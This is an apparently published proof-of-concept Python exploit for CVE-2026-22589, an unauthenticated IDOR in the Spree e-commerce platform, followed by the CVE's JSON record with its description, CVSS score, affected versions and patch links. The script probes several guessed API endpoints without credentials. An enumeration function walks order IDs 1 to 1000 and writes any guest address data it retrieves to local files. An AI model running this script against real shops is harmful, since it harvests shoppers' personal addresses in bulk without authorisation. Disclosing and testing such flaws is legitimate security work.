CVE-2026-22589

# CVE-2026-22589 PoC - Spree IDOR Vulnerability # Description: Unauthenticated IDOR allows access to guest address information # Affected: Spree < 4.10.2, 5.0.7, 5.1.9, 5.2.5 import requests import sys def exploit_spre_idor(target_url, order_id): """ Exploit IDOR vulnerability in Spree e-commerce platform to retrieve guest address information without authentication. Args: target_url: Base URL of the vulnerable Spree application order_id: Valid order ID (can be guessed or enumerated) Returns: dict: Address information if successful, None otherwise """ # Try multiple endpoint patterns for address retrieval endpoints = [ f"{target_url}/api/orders/{order_id}/addresses", f"{target_url}/api/v2/orders/{order_id}/addresses", f"{target_url}/api/addresses?order_id={order_id}" ] for endpoint in endpoints: try: # Send unauthenticated GET request response = requests.get(endpoint, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Success! Retrieved address from: {endpoint}") print(f"[+] Response: {data}") return data elif response.status_code == 401: print(f"[-] Endpoint requires authentication: {endpoint}") else: print(f"[-] Unexpected status code {response.status_code} from: {endpoint}") except requests.RequestException as e: print(f"[-] Request failed for {endpoint}: {e}") return None def enumerate_addresses(target_url, start_id=1, end_id=1000): """ Enumerate and extract all accessible guest addresses by iterating through order/address IDs. Args: target_url: Base URL of the vulnerable Spree application start_id: Starting ID for enumeration end_id: Ending ID for enumeration """ print(f"[*] Starting enumeration from ID {start_id} to {end_id}") for order_id in range(start_id, end_id + 1): result = exploit_spre_idor(target_url, order_id) if result: print(f"[!] Found address data for Order ID {order_id}") # Save to file for later analysis with open(f"addresses_{order_id}.json", "w") as f: f.write(str(result)) print("[*] Enumeration complete") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2026-22589_poc.py <target_url> <order_id>") print("Example: python cve-2026-22589_poc.py https://shop.example.com 12345") sys.exit(1) target = sys.argv[1] order_id = sys.argv[2] print(f"[*] Targeting: {target}") print(f"[*] Order ID: {order_id}") result = exploit_spre_idor(target, order_id) if result: print("[+] Exploitation successful!") else: print("[-] Exploitation failed - target may not be vulnerable")

{"cve": {"id": "CVE-2026-22589", "sourceIdentifier": "[email protected]", "published": "2026-01-10T04:16:01.343", "lastModified": "2026-01-22T13:45:29.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an unauthenticated attacker to access guest address information without supplying valid credentials or session cookies. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5."}, {"lang": "es", "value": "Spree es una solución de comercio electrónico de código abierto construida con Ruby on Rails. Antes de las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5, se identificó una vulnerabilidad de Referencia Directa a Objeto Insegura No Autenticada (IDOR) que permite a un atacante no autenticado acceder a información de dirección de invitado sin proporcionar credenciales válidas o cookies de sesión. Este problema ha sido parcheado en las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.2", "matchCriteriaId": "B265915C-3AA8-4B6C-9794-DA08F6359D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.7", "matchCriteriaId": "C6C152A8-FCA5-4420-A138-E09B27970EE4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1.0", "versionEndExcluding": "5.1.9", "matchCriteriaId": "54EEC933-938E-404B-A87B-3771931D5E23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.2.5", "matchCriteriaId": "1C6D055D-A9A8-46E1-A16C-FE17B66E800B"}]}]}], "references": [{"url": "https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}, {"url": "https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}]}}